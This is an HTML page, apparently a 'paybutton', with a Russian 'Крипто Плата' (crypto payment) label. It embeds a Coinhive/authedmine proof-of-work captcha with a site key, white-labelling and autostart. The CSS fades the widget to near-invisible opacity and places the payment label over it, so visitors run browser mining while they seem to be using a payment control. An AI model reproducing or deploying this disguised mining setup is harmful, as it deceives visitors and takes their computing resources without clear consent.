<!DOCTYPE html>

<html>	
	
  <head>
	  
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>paybutton</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">
    <script defer src="https://use.fontawesome.com/releases/v5.0.6/js/all.js"></script>
	  <style>
		  .coinhive-captcha {
                  margin-top: 20%;
			  opacity: 0.1;
			  position: absolute;
			  /*left: 202px;*/top: 0px;}
		  .wrap {
                 background: #000;
			  position: absolute;
                        }
		  		  .wrapp {
  /*  background: #999;*/
    border: 1px solid;
    width: 30px;
    height: 30px;
    position: absolute;
    left: 246px;
    top: 23px;
    margin-top: 20%;
                        }
		  		  		  .wrappp {
   /* background: green;*/
    width: 120px;
    height: 30px;
    position: absolute;
    left: 54px;
    top: 26px;
    margin-top: 20%;
                        }
	  </style>
  </head>
  <body>
  <section class="section">
    <div class="container">
   <!--  <center> <h1 class="title">
       Крипто Плата
	     </h1> </center> -->
      <p class="subtitle">
      <!--   |<strong>=</strong>! -->
      </p>
      
      <form action="?" method="post">
	<!-- other form fields -->

	<script src="https://authedmine.com/lib/captcha.min.js" async></script>
	<script>
		function myCaptchaCallback(token) {
			document.write('Ваш Токен : ' + token);
		}
	      </script><center><div class="wrapp"></div><div class="wrappp"> Крипто Плата</div>
	    
	<div class="coinhive-captcha" 
	        data-whitelabel="true"
		data-hashes="256" 
		data-key="CCh8sCXDoIyDX511AuRqbdayVtoJIQOb"
		data-disable-elements="input[type=submit]"
		data-callback="myCaptchaCallback"
	     	data-text="#FFF"
	        data-autostart="true"

          >
		<em>Loading ...<br>
		error</em>
	</div>
	    
	      </center>
</form>
	    
	   
      
    </div>
  </section>
  </body>
</html>
